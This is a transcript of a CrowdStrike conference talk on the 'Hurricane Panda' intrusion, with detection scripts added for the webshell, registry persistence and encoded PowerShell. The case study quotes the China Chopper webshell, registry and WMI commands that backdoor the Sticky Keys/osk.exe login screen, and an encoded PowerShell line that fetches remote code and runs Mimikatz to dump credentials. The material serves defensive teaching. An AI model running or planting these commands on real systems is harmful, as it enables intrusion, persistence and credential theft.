TRANSCRIPT
HAND-TO-HAND COMBAT WITH A TARGETED ATTACKER
GEORGE KURTZ, CEO & CO-FOUNDER
THE GAP OF SECURITY
A Little About Me…
2014 CrowdStrike, Inc. All rights reserved. 2
GEORGE KURTZ | PRESIDENT/CEO & CO-FOUNDER
CrowdStrike
Serial Entrepreneur: Author, entrepreneur, and speaker with 23 years in the security space
Prior to CrowdStrike: WW CTO and GM, as well as SVP of Enterprise at McAfee. Founder & CEO of Foundstone (acquired by McAfee in 2004)
www.hackingexposed7.com @George_Kurtz
WHO IS CROWDSTRIKE?
CrowdStrike is a pioneer in next-generation endpoint protection, threat intelligence, and pre/post response services
Trusted by some of the largest blue chip companies and three out of four of the top government agencies in the world
Led by security experts and industry veterans with over 200 years of relevant experience
Founded 2011
AGENDA
Current State of In-Security
CASE STUDY: Who is Hurricane Panda?
Take-aways
69%
200+ Days
$7.6M
$214
40%
Terrorists
Cybercriminals
Commercial Enterprises
Hacktivists/Vigilantes
Nation-States
WHY IS THIS HAPPENING - THE GAP
[Chart: threat sophistication, from opportunistic actors to determined actors, plotted against capability for damage and ability to prevent; labels on the chart: 40%, THE GAP]
TODAY’S HEADLINES
REAL FINANCIAL IMPACT OF IP THEFT
Nearly $1B loss in market cap overnight from a targeted attack!
WHAT ORGANIZATIONS CAN DO TODAY
Destroy & Dump - The New Reality
MAGINOT LINE IS NOT WORKING
[Chart: endpoint, network and web/mail defenses against opportunistic versus targeted attacks]
DEFENSE IN DEPTH IS SILENTLY FAILING AGAINST DETERMINED ADVERSARIES
ORGANIZATIONS BELIEVE THEY HAVE A MALWARE PROBLEM
ORGANIZATIONS BELIEVE THEY HAVE AN ADVERSARY PROBLEM
ADVANCED ATTACKERS EVADE traditional defenses and destroy today’s networks
Understanding the “Who” behind these attacks

CHINA
Comment Panda: Commercial, Government, Non-profit
Deep Panda: Financial, Technology, Non-profit
Foxy Panda: Technology & Communications
Anchor Panda: Government organizations, Defense & Aerospace, Industrial Engineering, NGOs
Hurricane Panda: Telecommunications Sector
Impersonating Panda: Financial Sector
Karma Panda: Dissident groups
Keyhole Panda: Electronics & Communications
Poisonous Panda: Energy Technology, G20, NGOs, Dissident Groups
Putter Panda: Governmental & Military
Toxic Panda: Dissident Groups
Union Panda: Industrial companies
Vixen Panda: Government

IRAN
Magic Kitten: Dissidents
Cutting Kitten: Energy Companies

INDIA
Viceroy Tiger: Government, Legal, Financial, Media, Telecom

RUSSIA
Energetic Bear: Oil and Gas Companies

NORTH KOREA
Silent Chollima: Government, Military, Financial

CRIMINAL
Singing Spider: Commercial, Financial
Union Spider: Manufacturing
Andromeda Spider: Numerous

HACKTIVIST/TERRORIST
Deadeye Jackal: Commercial, Financial, Media, Social Networking
Ghost Jackal: Commercial, Energy, Financial
Corsair Jackal: Commercial, Technology, Financial, Energy
Extreme Jackal: Military, Government
WHEN PANDAS ATTACK… MALWARE FREE INTRUSIONS
WHO IS HURRICANE PANDA?
Operational Window: Late 2013 – Present
Targeting: Telecommunications & Technology
Objectives: Recon, Lateral Movement, IP Theft
Locations: United States, Japan
Tools: Chopper Webshell, PlugX, HiKit
Capabilities:
Theft of Signing Certificates: Used to sign malware to help evade detection
Remote Access Tools: Use of malware and webshells for remote access
Escalation: Privileges and lateral movement with credential dumping tools
Exfil: Usage of FTP to send data out of an organization
THE ATTACK…
ADVERSARY ACTIVITIES REMAINED UNDETECTED FOR OVER ONE YEAR.
Chopper webshell:
<%@Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>
ATTACK PHASES: GAIN ACCESS / MAINTAIN PERSISTENCE / DUMP CREDENTIALS
SECURITY CHALLENGE: DETECTING & STOPPING A 72 BYTE BACKDOOR WRITTEN TO A WEBSERVER USING AN ARBITRARY FILE WRITE
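A defender-side check for the 72-byte Chopper stub shown above, added here as an example and not code from the talk or from CrowdStrike: it flags any file under a web root whose body contains the eval(Request.Item[...], "unsafe") construct, tolerating the case, whitespace and parameter-name changes an operator might make. The web root is a constructed in-memory sample standing in for a walk of the real IIS directory.

```python
import re

# The China Chopper ASPX stub from the slide is a single eval() of a request
# parameter with the "unsafe" flag. Match that construct regardless of case,
# whitespace, quote style or the parameter name the operator chose.
CHOPPER_RE = re.compile(
    r"""eval\s*\(\s*Request\.Item\s*\[\s*["'][^"']+["']\s*\]\s*,\s*["']unsafe["']\s*\)""",
    re.IGNORECASE,
)

def is_chopper_webshell(content: str) -> bool:
    """True if a page body contains the Chopper eval(Request.Item[...], "unsafe") stub."""
    return CHOPPER_RE.search(content) is not None

def scan_webroot(files: dict) -> list:
    """Return the sorted paths flagged as Chopper webshells.
    `files` maps path -> content, standing in for a walk of the real IIS web root."""
    return sorted(path for path, body in files.items() if is_chopper_webshell(body))

# Constructed sample web root (not from the talk): the exact 72-byte stub from the
# slide, a re-cased and re-spaced variant with a different parameter name, and two
# benign pages, one of which reads a request parameter without eval().
SAMPLE_WEBROOT = {
    r"C:\inetpub\wwwroot\default.aspx":
        '<%@Page Language="C#"%><html><body>Welcome</body></html>',
    r"C:\inetpub\wwwroot\img\c.aspx":
        '<%@Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>',
    r"C:\inetpub\wwwroot\upload\x.aspx":
        "<%@ Page Language='Jscript' %><% EVAL( Request.Item[ 'z' ] , 'unsafe' ); %>",
    r"C:\inetpub\wwwroot\about.aspx":
        '<%@Page Language="Jscript"%><%Response.Write(Request.Item["q"]);%>',
}

if __name__ == "__main__":
    for path in scan_webroot(SAMPLE_WEBROOT):
        print("possible Chopper webshell:", path)
```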
Registry command for the debugger hack (if done locally): reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f
Registry command for the debugger hack (if done remotely using WMI): wmic /user:<REDACTED> /password:<REDACTED> /node:<REDACTED> process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
SECURITY CHALLENGE: DETECTING PERSISTENCE THAT DOESN’T RELY ON A BINARY EXECUTABLE & BYPASSES THE LOGIN PROCESS
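One way to audit for the IFEO persistence above, added as an example that is not code from the talk or from CrowdStrike: parse the text of `reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" /s` and report accessibility binaries that carry a Debugger value. The list of binaries beyond osk.exe (sethc.exe is Sticky Keys) and the sample output are assumptions constructed for the example.

```python
import re

# Accessibility helpers that winlogon.exe launches from the logon screen. An IFEO
# "Debugger" value on any of them runs the debugger instead, before any logon.
# Assumed list: the slide shows the osk.exe case; Sticky Keys is sethc.exe.
ACCESSIBILITY_BINARIES = {"osk.exe", "sethc.exe", "utilman.exe", "narrator.exe",
                          "magnify.exe", "displayswitch.exe", "atbroker.exe"}
IFEO_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
VALUE_RE = re.compile(r"^\s+(\S+)\s+(REG_\w+)\s+(.*)$")   # "    Name    REG_TYPE    data"

def find_ifeo_debuggers(reg_output: str) -> list:
    """Parse the text of `reg query "<IFEO key>" /s` and return (image, debugger) pairs
    for accessibility binaries that carry a Debugger value."""
    prefix = IFEO_KEY.lower() + "\\"
    hits, current = [], None
    for line in reg_output.splitlines():
        if line.lower().startswith(prefix):
            current = line[len(prefix):].strip().lower()   # subkey name == image name
            continue
        m = VALUE_RE.match(line)
        if m and current in ACCESSIBILITY_BINARIES and m.group(1).lower() == "debugger":
            hits.append((current, m.group(3).strip()))
    return hits

# Constructed `reg query` output (not from the talk): osk.exe hijacked exactly as on
# the slide, sethc.exe pointed at cmd.exe by full path, and an unrelated IFEO entry.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe
    Debugger    REG_SZ    cmd.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe
    Debugger    REG_SZ    C:\Windows\System32\cmd.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\devenv.exe
    UseFilter    REG_DWORD    0x1
"""

if __name__ == "__main__":
    for image, debugger in find_ifeo_debuggers(SAMPLE_REG_QUERY):
        print(f"IFEO Debugger set on {image}: {debugger}")
```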
STICKY KEYS IN ACTION
BEFORE LOGGING IN THE ATTACKER HAS FULL SYSTEM PRIVILEGES WITH A COMMAND PROMPT WINDOW
Using base64-encoded commands in PowerShell:
powershell -windowStyle hidden -ExecutionPolicy ByPass -encodedCommand
DQAKAA0ACgBwAG8AdwBlAHIAcwBoAGUAbABsACAAIgBJAEUAWAAgACgATgBlAHcALQBPAGIAagBlAGMA
dAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4A
ZwAoACcAaAB0AHQAcAA6AC8ALwBpAHMALgBnAGQALwBvAGUAbwBGAHUASQAnACkAOwAgAEkAbgB2AG8A
awBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBEAHUAbQBwAEMAcgBlAGQAcwAiACAAPgAgAEMAOgBcAHUA
cwBlAHIAcwBcAGEALgB0AHgAdAANAAoAIAAgACAAIAANAAoA
SECURITY CHALLENGE: DETECTING PRIVILEGE ESCALATION & LATERAL MOVEMENT THAT RELIES ON MEMORY-BACKED FILES
Real commands evading traditional defenses:
powershell "IEX (New-Object Net.WebClient).DownloadString('http://<REDACTED>'); Invoke-Mimikatz -DumpCreds" > C:\users\a.txt
INDICATORS OF COMPROMISE VS. INDICATORS OF ATTACK - TRANSFORMATIONAL
Need to look out the windshield – not drive in the rear view mirror
REACTIVE INDICATORS OF COMPROMISE VS PROACTIVE INDICATORS OF ATTACK
IOCs: Malware, Signatures, Exploits, Vulnerabilities, IP Addresses
IOAs: Code Execution, Persistence, Stealth, Command & Control, Lateral Movement
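The encoded-PowerShell step above and the IOC-versus-IOA contrast, worked as one example added here (not code from the talk or from CrowdStrike): an IOC check matches image hashes against a feed, while IOA rules look at parent/child process behaviour and decode the -EncodedCommand argument (base64 of UTF-16LE) to spot the in-memory Invoke-Mimikatz run. The events, hashes and the <REDACTED> URL are constructed placeholders.

```python
import base64
CRED_THEFT_MARKERS = ("invoke-mimikatz", "dumpcreds", "downloadstring")

def decode_encoded_command(cmdline: str) -> str:
    """Plaintext of a -EncodedCommand argument (base64 of UTF-16LE), "" if none; accepts the -e/-enc prefixes powershell.exe does."""
    toks = cmdline.split()
    for i, tok in enumerate(toks[:-1]):
        t = tok.lower()
        if t.startswith("-") and len(t) > 1 and (t == "-ec" or "encodedcommand".startswith(t[1:])):
            try:
                return base64.b64decode(toks[i + 1]).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return ""
    return ""

def ioc_match(event: dict, known_bad_hashes: set) -> bool:
    """Reactive IOC check: is the image's hash on a known-bad list?"""
    return event["sha256"] in known_bad_hashes

def ioa_match(event: dict) -> list:
    """Proactive IOA check on behaviour from the slides; returns the rules that fired."""
    hits = []
    parent, image = event["parent"].lower(), event["image"].lower()
    if parent == "winlogon.exe" and image in ("cmd.exe", "powershell.exe"):
        hits.append("shell spawned from the logon screen (IFEO/Sticky Keys persistence)")
    if parent == "w3wp.exe" and image in ("cmd.exe", "powershell.exe"):
        hits.append("IIS worker spawned a shell (webshell code execution)")
    decoded = decode_encoded_command(event["cmdline"]).lower()
    if any(marker in decoded for marker in CRED_THEFT_MARKERS):
        hits.append("encoded PowerShell loading a credential dumper in memory")
    return hits

def encode_powershell(script: str) -> str:
    """UTF-16LE then base64, as powershell.exe expects; used only to build the sample below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed process-creation events (not from the talk). Hashes and the URL are
# placeholders: the in-memory Invoke-Mimikatz run never writes a file to hash.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://<REDACTED>'); Invoke-Mimikatz -DumpCreds"
EVENTS = [
    {"parent": "explorer.exe", "image": "notepad.exe", "sha256": "hash-0", "cmdline": "notepad.exe"},
    {"parent": "winlogon.exe", "image": "cmd.exe", "sha256": "hash-1", "cmdline": "cmd.exe"},
    {"parent": "w3wp.exe", "image": "powershell.exe", "sha256": "hash-2", "cmdline":
     "powershell -windowStyle hidden -ExecutionPolicy ByPass -encodedCommand " + encode_powershell(SAMPLE_SCRIPT)},
]
KNOWN_BAD_HASHES = {"hash-of-a-previously-seen-dropper"}  # placeholder IOC feed
def triage(events: list, known_bad_hashes: set) -> list:
    """Per event: (IOC hit?, IOA rules fired). IOCs miss everything here; IOAs catch two of three."""
    return [(ioc_match(e, known_bad_hashes), ioa_match(e)) for e in events]
```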
SECURITY TEAMS MUST ADJUST & GO REAL-TIME
New Detection Methods:
• Must be real-time or near real-time
• Sweeping just for IOCs is a losing proposition
• Must detect credential theft as it happens
• Manage privileged accounts
• 24x7 Managed Services to aid in detection & containment
REMEMBER: What happens in a virtual container is NOT what happens on your endpoints
“if you no longer go for a gap that exists, you are no longer a racing driver because we are competing, we are competing to win”
Ayrton Senna – F1 Driver & Champion
“if you no longer go for a gap that exists in your victim, you are no longer a true adversary”
-Bad guy inc.-
Questions?